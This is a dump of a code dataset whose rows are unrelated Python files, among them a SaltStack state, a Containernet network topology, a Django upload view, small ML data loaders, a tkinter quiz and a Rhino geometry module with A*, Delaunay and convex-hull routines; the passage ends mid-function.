text
stringlengths 8
6.05M
|
|---|
def node_classified(name, data={}):
'''
Classify node, create inventory level overrides and/or node models
:param name: Node FQDN
:param data: Node parameters passed to the classifier
'''
ret = {'name': name,
'changes': {},
'result': True,
'comment': 'Node "{0}" is already classified.'.format(name)}
if __opts__['test']:
ret['result'] = None
ret['comment'] = 'Node "{0}" would be classified'.format(name)
return ret
classification = __salt__['architect.node_classify'](name, data)
ret['comment'] = 'Node "{0}" has been classified'.format(name)
ret['changes']['Node'] = classification
return ret
|
# Copyright (c) 2015 SONATA-NFV and Paderborn University
# ALL RIGHTS RESERVED.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Neither the name of the SONATA-NFV, Paderborn University
# nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
#
# This work has been performed in the framework of the SONATA project,
# funded by the European Commission under Grant number 671517 through
# the Horizon 2020 and 5G-PPP programmes. The authors would like to
# acknowledge the contributions of their colleagues of the SONATA
# partner consortium (www.sonata-nfv.eu).
import logging
import time
from mininet.log import setLogLevel
from mininet.net import Containernet
from mininet.node import Controller
from mininet.cli import CLI
from mininet.link import TCLink
from mininet.log import info, setLogLevel
from emuvim.dcemulator.net import DCNetwork
from emuvim.api.rest.rest_api_endpoint import RestApiEndpoint
from emuvim.api.openstack.openstack_api_endpoint import OpenstackApiEndpoint
logging.basicConfig(level=logging.INFO)
setLogLevel('info') # set Mininet loglevel
logging.getLogger('werkzeug').setLevel(logging.DEBUG)
logging.getLogger('api.openstack.base').setLevel(logging.DEBUG)
logging.getLogger('api.openstack.compute').setLevel(logging.DEBUG)
logging.getLogger('api.openstack.keystone').setLevel(logging.DEBUG)
logging.getLogger('api.openstack.nova').setLevel(logging.DEBUG)
logging.getLogger('api.openstack.neutron').setLevel(logging.DEBUG)
logging.getLogger('api.openstack.heat').setLevel(logging.DEBUG)
logging.getLogger('api.openstack.heat.parser').setLevel(logging.DEBUG)
logging.getLogger('api.openstack.glance').setLevel(logging.DEBUG)
logging.getLogger('api.openstack.helper').setLevel(logging.DEBUG)
setLogLevel('info')
def create_topology():
net = DCNetwork(monitor=False, enable_learning=True)
dc1 = net.addDatacenter("dc1")
# add OpenStack-like APIs to the emulated DC
api1 = OpenstackApiEndpoint("0.0.0.0", 6001)
api1.connect_datacenter(dc1)
api1.start()
api1.connect_dc_network(net)
# add the command line interface endpoint to the emulated DC (REST API)
rapi1 = RestApiEndpoint("0.0.0.0", 5001)
rapi1.connectDCNetwork(net)
rapi1.connectDatacenter(dc1)
rapi1.start()
info('*** Adding docker containers\n')
srv = net.addDocker('srv', ip='10.0.0.203', dimage="constancegay/projet_sdci:server")
time.sleep(5)
GI = net.addDocker('GI', ip='10.0.0.202', dimage="constancegay/projet_sdci:gateway",
environment={"loc_ip": "10.0.0.202",
"loc_port": "8181",
"loc_name": "GI",
"rem_ip": "10.0.0.203",
"rem_port": "8080",
"rem_name": "srv"})
time.sleep(5)
mon = net.addDocker('mon', ip='10.0.0.204', dimage="constancegay/projet_sdci:mon")
# GFs
gf1 = net.addDocker('GF1', ip='10.0.0.201', dimage="constancegay/projet_sdci:gateway",
environment={"loc_ip": "10.0.0.201",
"loc_port": "8282",
"loc_name": "GF1",
"rem_ip": "10.0.0.202",
"rem_port": "8181",
"rem_name": "GI"})
gf2 = net.addDocker('GF2', ip='10.0.0.208', dimage="constancegay/projet_sdci:gateway",
environment={"loc_ip": "10.0.0.208",
"loc_port": "9004",
"loc_name": "GF2",
"rem_ip": "10.0.0.202",
"rem_port": "8181",
"rem_name": "GI"})
gf3 = net.addDocker('GF3', ip='10.0.0.212', dimage="constancegay/projet_sdci:gateway",
environment={"loc_ip": "10.0.0.212",
"loc_port": "9008",
"loc_name": "GF3",
"rem_ip": "10.0.0.202",
"rem_port": "8181",
"rem_name": "GI"})
time.sleep(5)
# ZONE 1 devices
dev1 = net.addDocker('dev1', ip='10.0.0.205', dimage="constancegay/projet_sdci:dev",
environment={"loc_ip": "10.0.0.205",
"loc_port": "9001",
"loc_name": "dev1",
"rem_ip": "10.0.0.201",
"rem_port": "8282",
"rem_name": "GF1"})
dev2 = net.addDocker('dev2', ip='10.0.0.206', dimage="constancegay/projet_sdci:dev",
environment={"loc_ip": "10.0.0.206",
"loc_port": "9002",
"loc_name": "dev2",
"rem_ip": "10.0.0.201",
"rem_port": "8282",
"rem_name": "GF1"})
dev3 = net.addDocker('dev3', ip='10.0.0.207', dimage="constancegay/projet_sdci:dev",
environment={"loc_ip": "10.0.0.207",
"loc_port": "9003",
"loc_name": "dev3",
"rem_ip": "10.0.0.201",
"rem_port": "8282",
"rem_name": "GF1"})
# ZONE 2 devices
dev4 = net.addDocker('dev4', ip='10.0.0.209', dimage="constancegay/projet_sdci:dev",
environment={"loc_ip": "10.0.0.209",
"loc_port": "9005",
"loc_name": "dev4",
"rem_ip": "10.0.0.208",
"rem_port": "9004",
"rem_name": "GF2"})
dev5 = net.addDocker('dev5', ip='10.0.0.210', dimage="constancegay/projet_sdci:dev",
environment={"loc_ip": "10.0.0.210",
"loc_port": "9006",
"loc_name": "dev5",
"rem_ip": "10.0.0.208",
"rem_port": "9004",
"rem_name": "GF2"})
dev6 = net.addDocker('dev6', ip='10.0.0.211', dimage="constancegay/projet_sdci:dev",
environment={"loc_ip": "10.0.0.211",
"loc_port": "9007",
"loc_name": "dev6",
"rem_ip": "10.0.0.208",
"rem_port": "9004",
"rem_name": "GF2"})
# ZONE 3 devices
dev7 = net.addDocker('dev7', ip='10.0.0.213', dimage="constancegay/projet_sdci:dev",
environment={"loc_ip": "10.0.0.213",
"loc_port": "9009",
"loc_name": "dev7",
"rem_ip": "10.0.0.212",
"rem_port": "9008",
"rem_name": "GF3"})
dev8 = net.addDocker('dev8', ip='10.0.0.214', dimage="constancegay/projet_sdci:dev",
environment={"loc_ip": "10.0.0.214",
"loc_port": "9010",
"loc_name": "dev8",
"rem_ip": "10.0.0.212",
"rem_port": "9008",
"rem_name": "GF3"})
dev9 = net.addDocker('dev9', ip='10.0.0.215', dimage="constancegay/projet_sdci:dev",
environment={"loc_ip": "10.0.0.215",
"loc_port": "9011",
"loc_name": "dev9",
"rem_ip": "10.0.0.212",
"rem_port": "9008",
"rem_name": "GF3"})
info('*** Adding switches\n')
s1 = net.addSwitch('s1')
s2 = net.addSwitch('s2')
s3 = net.addSwitch('s3')
s4 = net.addSwitch('s4')
s5 = net.addSwitch('s5')
info('*** Creating links\n')
net.addLink(s1, srv)
net.addLink(s1, GI)
net.addLink(s1, mon)
net.addLink(s2, s1)
net.addLink(s2, dc1)
net.addLink(s3, s2)
net.addLink(s4, s2)
net.addLink(s5, s2)
# ZONE 1
net.addLink(s3, gf1)
net.addLink(s3, dev1)
net.addLink(s3, dev2)
net.addLink(s3, dev3)
# ZONE 2
net.addLink(s4, gf2)
net.addLink(s4, dev4)
net.addLink(s4, dev5)
net.addLink(s4, dev6)
# ZONE 3
net.addLink(s5, gf3)
net.addLink(s5, dev7)
net.addLink(s5, dev8)
net.addLink(s5, dev9)
info('*** Starting network\n')
net.start()
info('*** Testing connectivity\n')
net.ping([srv, dev1])
info('*** Running CLI\n')
CLI(net)
info('*** Stopping network')
net.stop()
def main():
create_topology()
if __name__ == '__main__':
main()
|
# coding:utf-8
from __future__ import absolute_import, unicode_literals
__author__ = "golden"
__date__ = '2018/5/29'
import asyncio
async def loop1():
while True:
print('loop1')
await asyncio.sleep(1)
async def loop2():
while True:
print('loop2')
await asyncio.sleep(1)
loop = asyncio.get_event_loop()
asyncio.ensure_future(loop1())
asyncio.ensure_future(loop2())
loop.run_forever()
|
# -*- coding: utf-8 -*-
from django.shortcuts import render
from django.template import RequestContext
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse
from uploader.myapp.models import Document
from uploader.myapp.forms import DocumentForm
def list(request):
# upload file
if request.method == 'POST':
form = DocumentForm(request.POST, request.FILES)
if form.is_valid():
newdoc = Document(docfile=request.FILES['docfile'])
newdoc.save()
# redirect to list
return HttpResponseRedirect(reverse('list'))
else:
form = DocumentForm() # empty form
# load documents
documents = Document.objects.all()
# render list page and form
return render(
request,
'list.html',
{'documents': documents, 'form': form}
)
|
import os
from NeuralGraph.processing import pickle_to_input, lst_to_out
from NeuralGraph.util import Timer
from sklearn.model_selection import train_test_split
from collections import Counter
from NeuralGraph.preprocessing import padaxis
import torch as T
def str_key(a):
ka = a.strip().split('_')[2]
return ka
def pickle_out(start=0, amount=5, test_size=0.2, random_state=0,save_dir='/home/ubuntu/wangzhongxu/gcnn2/NGFP/dataset/pickle'):
input_lst = []
out = []
with Timer() as t:
dir_lst = os.listdir(save_dir)
dir_lst.sort(key=str_key)
for file in dir_lst[start:start+amount]:
file = '{}/{}'.format(save_dir, file)
input_lst += pickle_to_input(file)
# find max values
max_nodes, max_degree = [], []
for input in list(zip(*input_lst))[4]:
max_nodes.append(input.shape[0])
max_degree.append(input.shape[1])
# # print(max(max_nodes))
# # print(max(max_degree))
# print(Counter([i.numpy().tolist()[0] for i in list(zip(*input_lst))[5]]))
# tuple to list
input_lst = [list(input) for input in input_lst]
# print(type(input_lst[0][3]))
# padaxis col_3 col_4
for i in range(len(input_lst)):
input_lst[i][3] = T.from_numpy(padaxis(input_lst[i][3], max(max_nodes), axis=0))
input_lst[i][4] = T.from_numpy(padaxis(input_lst[i][4], max(max_nodes), axis=0, pad_value=-1))
input_lst[i][4] = T.from_numpy(padaxis(input_lst[i][4], max(max_degree), axis=1, pad_value=-1))
# print(type(input_lst[0][3]))
# max_nodes, max_degree = [], []
# for input in list(zip(*input_lst))[4]:
# max_nodes.append(input.shape[0])
# max_degree.append(input.shape[1])
# print(Counter(max_nodes))
# print(Counter(max_degree))
# split train test set
tmp_lst = [0 for _ in range(len(input_lst))]
train_set, valid_set, _, _ = train_test_split(input_lst, tmp_lst, test_size=test_size, random_state=random_state)
# print(type(train_set))
# print(type(train_set[0][0]))
train_out, valid_out = lst_to_out(train_set), lst_to_out(valid_set)
# print('\ntrain data amount: {} datas'.format(len(train_out[0])))
# print('train_out length: {}\ntrain_out ctx shape: {}'.format(len(train_out), train_out[4].shape))
# print('\nvalid data amount: {} datas'.format(len(valid_out[0])))
# print('valid_out length: {}\nvalid_out ctx shape: {}'.format(len(valid_out), valid_out[4].shape))
return train_out, valid_out
if __name__ == '__main__':
pickle_out(amount=5, save_dir='/home/ubuntu/wangzhongxu/gcnn2/NGFP/dataset/pickle')
# amount=1, spent time: 0.45s, MEM usage rate: 1.1%
# amount=5, spent time: 2.13s, MEM usage rate: 4.5%
# amount=10, spent time: 9.93s, MEM usage rate: 12.5%
|
#!/usr/bin/env python
# coding=utf-8
from torch.utils.data import Dataset
import skimage.io as io
import torch
class MNISTDataset(Dataset):
#mnist手写体数据集
def __init__(self,img_list_path,dataset_root_path="/dataset/human_attribute/",transform=None):
self.img_list_path = img_list_path
self.transform = transform
self.img_label_dic = {"img_path":[],"label":[]}
self.dataset_root_path = dataset_root_path
fr = open(self.img_list_path,"r")
for line in fr:
strings = line.split(" ")
strings[1] = strings[1].split("\n")[0]
self.img_label_dic["img_path"].append(strings[0])
self.img_label_dic["label"].append(strings[1])
def __len__(self):
if(len(self.img_label_dic["img_path"]) != len(self.img_label_dic["label"])):
return 0
return len(self.img_label_dic["img_path"])
def __getitem__(self,idx):
img_path = os.path.join(self.dataset_root_path,self.img_label_dic["img_path"][idx])
img = io.imread(img_path)
label = int(self.img_label_dic["label"][idx]) #切记这一步要把label转换成int 否则后面不能转换成tensor
if self.transform:
img = self.transform(img)
label = torch.LongTensor([label]) #要求必须是longtensor 不能是floattensor
return img,label.squeeze()
|
# 找到分类讨论的关键
# 此题首先就是按照取模3为0,1,2分类
# 0具有特殊性,可以作为分类的大前提
class Solution:
def stoneGameIX(self, stones: List[int]) -> bool:
s = [0, 0, 0]
for i in stones:
s[i%3] += 1
if s[0] % 2 == 0:
return s[1] > 0 and s[2] > 0
else:
return abs(s[1] - s[2]) > 2
|
#Modules
from tkinter import*
from tkinter import ttk
#----------------------------------------
class MyQuiz():
def __init__(self,root):
self.Start = Frame(root)
self.Start.grid()
self.Title = Label(self.Start, text="English Quiz", font = 30)
self.Title.grid(columnspan = 2)
self.StartQuiz = ttk.Button(self.Start, text = "Start Quiz", command = NextPage)
self.StartQuiz.grid(column = 1)
class StartQuiz():
def __init__(self,root):
self.StartQuiz = Frame(root)
Quiz.Start.grid_forget()
self.StartQuiz.grid()
#Radiobutton
self.v = StringVar(root, "1")
values = {"Level 1" : "1", "Level 2" : "2", "Level 3" : "3"}
self.ChooseLevel = Label(self.StartQuiz, text = "Choose Level", bg = "black", fg = "white", font = 30)
self.ChooseLevel.grid(columnspan = 3)
for (text, value) in values.items():
Radiobutton(self.StartQuiz, text = text, variable = self.v, value = value, indicator = 0,background = "light blue").grid()
self.NextBut = ttk.Button(self.StartQuiz, text = "Next", command = lambda: NextPages(self.v))
self.NextBut.grid(row = 3)
def NextPage():
global LevelChoosing
LevelChoosing = StartQuiz(root)
#Difficulty 1 -----------------------------------------------------------------------------------------
class Level1:
def __init__(self, root):
LevelChoosing.StartQuiz.grid_forget()
self.Level1 = Frame(root)
self.Level1.grid()
self.Title = Label(self.Level1, text = "Level 2")
self.Title.grid(columnspan = 2, row = 0,)
self.Question = Label(self.Level1)
self.Question.grid(column = 1, row = 2)
self.QEntry = Entry(self.Level1)
self.QEntry.grid(row = 3, column = 2)
def NextQuestion():
pass
self.Next_But = ttk.Button(self.Level1, text = "Next", command = NextQuestion)
self.Next_But.grid(row = 4, column = 0)
Q_Entry = self.QEntry.get()
Q_List = ["How many weeks are there in a year?","If John had 50 candies and he ate 40, what does he have?",
"Can you count how many days on your finger is in a leap year?","If Brook Book booked bookings twice",
"how many books booking did book book?","What does OOP stand for?"]
Q_Answer = ["53", "Diabetes", "No, because you only have 10 fingers", "Twice", "Object Oriented Programming"]
def Submit_Ans():
if Q_Entry == "":
self.Question.config(text = "Correct!")
self.Next_But.grid()
pass
else:
self.Question.config(text = "Bad!")
self.Next_But.grid()
pass
self.Submit_But = ttk.Button(self.Level1, text= "Submit", command = Submit_Ans)
self.Submit_But.grid(row = 4, column = 1)
lvl1 = None
def NextPages(value_chosen):
if value_chosen.get() == "1":
lvl1 = Level1(root)
else:
pass
#runs when the name of the program is recognized as True
if __name__ == "__main__":
root = Tk()
root.title("English Quiz")
Quiz = MyQuiz(root)
root.geometry("250x200+420+160")
|
import Rhino as rc
import math
import random
import Rhino.Geometry as rg
import scriptcontext as sc
import rhinoscriptsyntax as rs
import util
from itertools import combinations
import clr; clr.AddReference("Grasshopper")
import Grasshopper as gh
#Computational Geometry
def PoissonDiscSampling(r, width, height):
"""Generates points within the domains
inputs:
r - Minimum distance between samples
width - highest x domain
height - highest y domain
returns:
rc.Geometry.Point3d [list]
"""
def get_cell_coords(pt):
"""Get the coordinates of the cell that pt = (x,y) falls in."""
return int(pt[0] // a), int(pt[1] // a)
def get_neighbours(coords):
"""Return the indexes of points in cells neighbouring cell at coords.
For the cell at coords = (x,y), return the indexes of points in the cells
with neighbouring coordinates illustrated below: ie those cells that could
contain points closer than r.
ooo
ooooo
ooXoo
ooooo
ooo
"""
dxdy = [(-1,-2),(0,-2),(1,-2),(-2,-1),(-1,-1),(0,-1),(1,-1),(2,-1),
(-2,0),(-1,0),(1,0),(2,0),(-2,1),(-1,1),(0,1),(1,1),(2,1),
(-1,2),(0,2),(1,2),(0,0)]
neighbours = []
for dx, dy in dxdy:
neighbour_coords = coords[0] + dx, coords[1] + dy
if not (0 <= neighbour_coords[0] < nx and
0 <= neighbour_coords[1] < ny):
# We're off the grid: no neighbours here.
continue
neighbour_cell = cells[neighbour_coords]
if neighbour_cell is not None:
# This cell is occupied: store this index of the contained point.
neighbours.append(neighbour_cell)
return neighbours
def point_valid(pt):
"""Is pt a valid point to emit as a sample?
It must be no closer than r from any other point: check the cells in its
immediate neighbourhood.
"""
cell_coords = get_cell_coords(pt)
for idx in get_neighbours(cell_coords):
nearby_pt = samples[idx]
# Squared distance between or candidate point, pt, and this nearby_pt.
distance2 = (nearby_pt[0]-pt[0])**2 + (nearby_pt[1]-pt[1])**2
if distance2 < r**2:
# The points are too close, so pt is not a candidate.
return False
# All points tested: if we're here, pt is valid
return True
def get_point(k, refpt):
"""Try to find a candidate point relative to refpt to emit in the sample.
We draw up to k points from the annulus of inner radius r, outer radius 2r
around the reference point, refpt. If none of them are suitable (because
they're too close to existing points in the sample), return False.
Otherwise, return the pt.
"""
i = 0
while i < k:
rho, theta = random.uniform(r, 2*r), random.uniform(0, 2*math.pi)
pt = refpt[0] + rho*math.cos(theta), refpt[1] + rho*math.sin(theta)
if not (0 <= pt[0] < width and 0 <= pt[1] < height):
# This point falls outside the domain, so try again.
continue
if point_valid(pt):
return pt
i += 1
# We failed to find a suitable point in the vicinity of refpt.
return False
# Choose up to k points around each reference point as candidates for a new
# sample point
k = 30
# Cell side length
a = r/math.sqrt(2)
# Number of cells in the x- and y-directions of the grid
nx, ny = int(width / a) + 1, int(height / a) + 1
# A list of coordinates in the grid of cells
coords_list = [(ix, iy) for ix in range(nx) for iy in range(ny)]
# Initilalize the dictionary of cells: each key is a cell's coordinates, the
# corresponding value is the index of that cell's point's coordinates in the
# samples list (or None if the cell is empty).
cells = {coords: None for coords in coords_list}
# Pick a random point to start with.
pt = (random.uniform(0, width), random.uniform(0, height))
samples = [pt]
# Our first sample is indexed at 0 in the samples list...
cells[get_cell_coords(pt)] = 0
# ... and it is active, in the sense that we're going to look for more points
# in its neighbourhood.
active = [0]
nsamples = 1
# As long as there are points in the active list, keep trying to find samples.
while active:
# choose a random "reference" point from the active list.
idx = random.choice(active)
refpt = samples[idx]
# Try to pick a new point relative to the reference point.
pt = get_point(k, refpt)
if pt:
# Point pt is valid: add it to the samples list and mark it as active
samples.append(pt)
nsamples += 1
active.append(len(samples)-1)
cells[get_cell_coords(pt)] = len(samples) - 1
else:
# We had to give up looking for valid points near refpt, so remove it
# from the list of "active" points.
active.remove(idx)
rcPts = []
for sample in samples:
rcPts.append(rc.Geometry.Point3d(sample[0], sample[1], 0))
return rcPts
class AStar():
"""
Setup the list of nodes using __init__ then call AStarPathFinder(start, end) to return a path of nodes.
example:
searchNetwork = AStar(srfs)
start = searchNetwork.GetNodeClosestToPt(rg.Point3d(0,0,0))
end = searchNetwork.GetNodeClosestToPt(rg.Point3d(50,50,0))
result, path = searchNetwork.AStarPathFinder(start, end)
"""
def __init__(self, srfs):
"""
parameter:
srfs [list]: triangular srfs, not joined
"""
self.nodes = []
self.start = None
self.end = None
#Create Nodes
for srf in srfs:
srfPts = srf.Brep.Vertices
thisSrfNodes = []
for srfPt in srfPts:
pt = rg.Point3d(srfPt.Location.X, srfPt.Location.Y, 0)
node0 = None
for node in self.nodes:
if node.pos == pt:
node0 = node
break
if node0 is None:
node0 = self.Node(pt)
thisSrfNodes.append(node0)
#Setup node neighbors
for thisSrfNode in thisSrfNodes:
for otherNode in thisSrfNodes:
if thisSrfNode is otherNode: continue
if otherNode not in thisSrfNode.neighbors:
thisSrfNode.neighbors.append(otherNode)
if thisSrfNode not in self.nodes:
self.nodes.append(thisSrfNode)
def GetNodeClosestToPt(self, pt):
"""
parameters:
pt (point): point to find node closest to
returns:
node: node closest to pt
"""
closestDist = None
closestNode = None
for node in self.nodes:
d = rs.Distance(pt, node.pos)
if d < closestDist or closestDist is None:
closestDist = d
closestNode = node
return closestNode
def AStarPathFinder(self, start, end):
"""
paramters:
start (node):
end (node):
returns:
Bool (success or failure)
list (nodes visited) (use the .pos to get the rhino point)
"""
openSet = [start]
closedSet = []
path = []
searching = True
while searching:
if sc.escape_test(True): return
if len(openSet) > 0:
#Choose tile with lowest f score
lowestTile = openSet[0]
for tile in openSet:
if tile is lowestTile: continue
if tile.f < lowestTile.f or lowestTile is None:
lowestTile = tile
current = lowestTile
path = []
temp = current
path.append(temp)
while temp.previous:
path.append(temp.previous)
temp = temp.previous
#Check if at the end
if current is end:
searching = False
break
#Move current tile from open to closed set
openSet.remove(current)
closedSet.append(current)
#Check all the neighbors
for neighbor in current.neighbors:
#if neighbor.type == 0: continue #Use this if nodes are blocked
if neighbor not in closedSet:
tempG = current.g + rs.Distance(current.pos, neighbor.pos)
#Is this a better path?
if neighbor not in openSet:
openSet.append(neighbor)
elif tempG >= neighbor.g:
#It is not a better path
continue
neighbor.previous = current
neighbor.g = tempG
neighbor.h = rs.Distance(current.pos, end.pos)
neighbor.f = neighbor.g + neighbor.h
else:
#print "No Solution"
return False, None
return True, path
class Node():
def __init__(self, pt):
self.pos = pt
self.neighbors = []
self.previous = None
self.f = 0
self.g = 0
self.h = 0
self.type = None
class AStarMesh():
"""
Setup the list of nodes using __init__ then call AStarPathFinder(start, end) to return a path of nodes.
example:
searchNetwork = geo.AStarMesh(mesh, sourceIndex, targetIndex)
result, path = searchNetwork.AStarPathFinder()
"""
def __init__(self, mesh, start, end):
"""
parameter:
srfs [list]: triangular srfs, not joined
"""
self.nodes = []
for i, v in enumerate(mesh.Vertices):
self.nodes.append(self.Node(v))
for i, v in enumerate(mesh.Vertices):
indices = mesh.Vertices.GetConnectedVertices(i)
for index in indices:
self.nodes[i].neighbors.append(self.nodes[index])
self.start = self.nodes[start]
self.end = self.nodes[end]
if False:
#Create Nodes
for srf in srfs:
srfPts = srf.Brep.Vertices
thisSrfNodes = []
for srfPt in srfPts:
pt = rg.Point3d(srfPt.Location.X, srfPt.Location.Y, 0)
node0 = None
for node in self.nodes:
if node.pos == pt:
node0 = node
break
if node0 is None:
node0 = self.Node(pt)
thisSrfNodes.append(node0)
#Setup node neighbors
for thisSrfNode in thisSrfNodes:
for otherNode in thisSrfNodes:
if thisSrfNode is otherNode: continue
if otherNode not in thisSrfNode.neighbors:
thisSrfNode.neighbors.append(otherNode)
if thisSrfNode not in self.nodes:
self.nodes.append(thisSrfNode)
def GetNodeClosestToPt(self, pt):
"""
parameters:
pt (point): point to find node closest to
returns:
node: node closest to pt
"""
closestDist = None
closestNode = None
for node in self.nodes:
d = rs.Distance(pt, node.pos)
if d < closestDist or closestDist is None:
closestDist = d
closestNode = node
return closestNode
def AStarPathFinder(self):
"""
paramters:
start (node):
end (node):
returns:
Bool (success or failure)
list (nodes visited) (use the .pos to get the rhino point)
"""
openSet = [self.start]
closedSet = []
path = []
searching = True
while searching:
if sc.escape_test(True): return
if len(openSet) > 0:
#Choose tile with lowest f score
lowestTile = openSet[0]
for tile in openSet:
if tile is lowestTile: continue
if tile.f < lowestTile.f or lowestTile is None:
lowestTile = tile
current = lowestTile
path = []
temp = current
path.append(temp)
while temp.previous:
path.append(temp.previous)
temp = temp.previous
#Check if at the end
if current is self.end:
searching = False
break
#Move current tile from open to closed set
openSet.remove(current)
closedSet.append(current)
#Check all the neighbors
for neighbor in current.neighbors:
#if neighbor.type == 0: continue #Use this if nodes are blocked
if neighbor not in closedSet:
tempG = current.g + rs.Distance(current.pos, neighbor.pos)
#Is this a better path?
if neighbor not in openSet:
openSet.append(neighbor)
elif tempG >= neighbor.g:
#It is not a better path
continue
neighbor.previous = current
neighbor.g = tempG
neighbor.h = rs.Distance(current.pos, self.end.pos)
neighbor.f = neighbor.g + neighbor.h
else:
#print "No Solution"
return False, None
return True, path
class Node():
def __init__(self, pt):
self.pos = rg.Point3d(pt)
self.neighbors = []
self.previous = None
self.f = 0
self.g = 0
self.h = 0
self.type = None
def Delaunay2d(pts):
"""
Delaunay Triangulation
parameters:
pts [list]
return:
PolylineCurve [list]: in counter-clockwise orientation
"""
triangles = []
set = list(combinations(pts,3))
for tuple in set:
c1 = tuple[0]
c2 = tuple[1]
c3 = tuple[2]
if (c1[0]-c2[0])*(c3[1]-c2[1])-(c1[1]-c2[1])*(c3[0]-c2[0]) != 0:
circle = rg.Circle(c1,c2,c3)
center = circle.Center
circle = circle.ToNurbsCurve()
delaunay = 0
for point in pts:
if circle.Contains(point) == rg.PointContainment.Inside:
delaunay = 1
continue
if delaunay == 0:
crv = rg.PolylineCurve([c1,c2,c3,c1])
if crv.ClosedCurveOrientation() == rg.CurveOrientation.Clockwise:
crv.Reverse()
triangles.append(crv)
return triangles
def Delaunay2dPts(pts):
"""
Delaunay Triangulation
parameters:
pts [list]
return:
Pts [list]: in counter-clockwise orientation
"""
triangles = []
set = list(combinations(pts,3))
for tuple in set:
c1 = tuple[0]
c2 = tuple[1]
c3 = tuple[2]
if (c1[0]-c2[0])*(c3[1]-c2[1])-(c1[1]-c2[1])*(c3[0]-c2[0]) != 0:
circle = rg.Circle(c1,c2,c3)
circle = circle.ToNurbsCurve()
delaunay = 0
for point in pts:
if circle.Contains(point) == rg.PointContainment.Inside:
delaunay = 1
continue
if delaunay == 0:
if False:
c1t = circle.ClosestPoint(c1)[1]
c2t = circle.ClosestPoint(c2)[1]
c3t = circle.ClosestPoint(c3)[1]
group = [[c1t, c1], [c2t, c2], [c3t, c3]]
group.sort()
triangles.append([group[0][1],group[1][1],group[2][1]])
triangles.append([c1, c2, c3])
return triangles
def DelaunayMesh(pts, plane):
"""
Delaunay Triangulation to a mesh
parameters:
pts [list]
plane: Plane to project to
return:
Mesh
"""
mesh = rg.Mesh()
ptsList = rc.Collections.Point3dList(pts)
#Transform to worldXY
xform = rg.Transform.PlaneToPlane(plane, rg.Plane.WorldXY)
ptsList.Transform(xform)
#Add pts to mesh
for pt in ptsList:
mesh.Vertices.Add(pt)
#Project to plane
ptsList.SetAllZ(0)
#Find delaunay
allPts = Delaunay2dPts(ptsList)
#Return to correct Z
returnToZPts = []
for tri in allPts:
mesh.Faces.AddFace(ptsList.ClosestIndex(tri[0]), ptsList.ClosestIndex(tri[1]), ptsList.ClosestIndex(tri[2]))
#Return to original space
returnXform = rg.Transform.PlaneToPlane(rg.Plane.WorldXY, plane)
mesh.Transform(returnXform)
mesh.UnifyNormals()
mesh.RebuildNormals()
return mesh
def Voronoi2D(pts, bbCorners = None):
"""
Calculates 2d voronoi using Grasshopper code
parameters:
pts (rg.Point3d)[list]
bbCorners (rg.Point3d)[list]: 4 points for boundary
returns:
rg.PolylineCurve [list]: Closed region
"""
if bbCorners is None:
# Create a boundingbox and get its corners
bb = rc.Geometry.BoundingBox(pts)
d = bb.Diagonal
dl = d.Length
f = dl/15
bb.Inflate(f,f,f)
bbCorners = bb.GetCorners()
# Create a list of outline nodes using the BB
outline = gh.Kernel.Geometry.Node2List()
for p in bbCorners:
n = gh.Kernel.Geometry.Node2(p.X,p.Y)
outline.Append(n)
# Create a list of nodes
nodes = gh.Kernel.Geometry.Node2List()
for p in pts:
n = gh.Kernel.Geometry.Node2(p.X,p.Y)
nodes.Append(n)
# Calculate the delaunay triangulation
delaunay = gh.Kernel.Geometry.Delaunay.Solver.Solve_Connectivity(nodes,0.1,False)
# Calculate the voronoi diagram
voronoi = gh.Kernel.Geometry.Voronoi.Solver.Solve_Connectivity(nodes,delaunay,outline)
# Get polylines from the voronoi cells and return them to GH
polylines = []
for c in voronoi:
pl = c.ToPolyline()
polylines.append(pl.ToPolylineCurve())
return polylines
class ConvexHull():
"""
Code modified from https://startupnextdoor.com/computing-convex-hull-in-python/
initialize then use get_hull_points or get_polyline
paramters:
allPts (pts [point]): list of pts
"""
def __init__(self, allPts):
self._hull_points = []
self._points = allPts
self.compute_hull()
def _get_orientation(self, origin, p1, p2):
'''
Returns the orientation of the Point p1 with regards to Point p2 using origin.
Negative if p1 is clockwise of p2.
:param p1:
:param p2:
:return: integer
'''
difference = (
((p2.X - origin.X) * (p1.Y - origin.Y))
- ((p1.X - origin.X) * (p2.Y - origin.Y))
)
return difference
def compute_hull(self):
'''
Computes the points that make up the convex hull.
:return:
'''
points = self._points
# get leftmost point
start = points[0]
min_x = start.X
for p in points[1:]:
if p.X < min_x:
min_x = p.X
start = p
point = start
self._hull_points.append(start)
far_point = None
while far_point is not start:
# get the first point (initial max) to use to compare with others
p1 = None
for p in points:
if p is point:
continue
else:
p1 = p
break
far_point = p1
for p2 in points:
# ensure we aren't comparing to self or pivot point
if p2 is point or p2 is p1:
continue
else:
direction = self._get_orientation(point, far_point, p2)
if direction > 0:
far_point = p2
self._hull_points.append(far_point)
point = far_point
def get_hull_points(self):
"""
returns:
pts [list]
"""
if self._points and not self._hull_points:
self.compute_hull()
return self._hull_points
def get_polyline(self):
"""
returns:
polyline
"""
return rc.Geometry.Polyline(self._hull_points)
def minBoundingBox(crv):
"""Returns the minimal 2d bounding box of a curve or surface.
Parameters:
crv (curve) = planar curve or surface
Returns:
polylineCurve = min polyline based on area
"""
#Get control points
P = rs.CurveEditPoints(crv)
p = []
for i in range(0, len(P)-1):
p.append(P[i])
#get The convex hull
hull = ConvexHull(p)
convexHull = hull.get_polyline()
minArea = None
minBoundary = None
plane = crv.TryGetPlane()[1]
normal = plane.Normal
#For each edge
for i in range(convexHull.SegmentCount):
edge = convexHull.SegmentAt(i)
segVec = edge.PointAt(0) - edge.PointAt(1)
yVec = rs.VectorCrossProduct(normal, segVec)
plane = rg.Plane(rs.coerce3dpoint((0,0,0)), segVec, yVec)
bbPts = rs.BoundingBox(crv, view_or_plane = plane)
newPts = bbPts[:4]
newPts.append(bbPts[0])
pline = rg.PolylineCurve(newPts)
am = rg.AreaMassProperties.Compute(pline)
area = am.Area
if area < minArea or minArea is None:
minArea = area
minBoundary = pline
return minBoundary
#Pts
def MidPoint(pt1, pt2):
"""
